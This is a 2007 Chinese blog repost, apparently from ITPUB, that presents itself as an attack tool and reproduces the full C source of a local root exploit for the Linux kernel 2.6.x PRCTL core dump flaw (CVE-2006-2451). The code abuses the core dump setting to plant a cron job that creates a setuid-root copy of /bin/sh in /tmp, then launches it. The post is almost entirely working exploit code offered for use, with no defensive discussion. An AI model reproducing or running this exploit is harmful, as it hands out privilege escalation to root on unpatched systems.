Linux Kernel2.6x 最新本地溢位程式碼(轉)

BSDLite發表於2007-08-15
Linux Kernel2.6x 最新本地溢位程式碼(轉)[@more@]工具分類:攻擊程式
執行平臺:Linux
工具大小:1684
Bytes檔案MD5 :f011910d6400652177c3b2e66bfb7144
工具來源:
Linux Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4)
PRCTL Core Dump Handling - Local r00tBy: dreyer & RoMaNSoFt[ 10.Jul.2006 ]
CODE:
/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer (main PoC code) */
/* - RoMaNSoFt (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/

#include
#include
#include
#include
#include
#include
#include
#include

char *payload=" SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin * * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core ";

int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t ");
printf("By: dreyer & RoMaNSoFt ");
printf("[ 10.Jul.2006 ] ");

corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);

printf("[*] Creating Cron entry ");

if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}

kill(child, SIGSEGV);

printf("[*] Sleeping for aprox. one minute (** please wait **) ");
sleep(62);

printf("[*] Running shell (remember to remove /tmp/sh when finished) ... ");
system("/tmp/sh -p");
}

來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10617542/viewspace-960173/,如需轉載,請註明出處,否則將追究法律責任。

Linux Kernel2.6x 最新本地溢位程式碼(轉)
請登入後發表評論 登入
全部評論

相關文章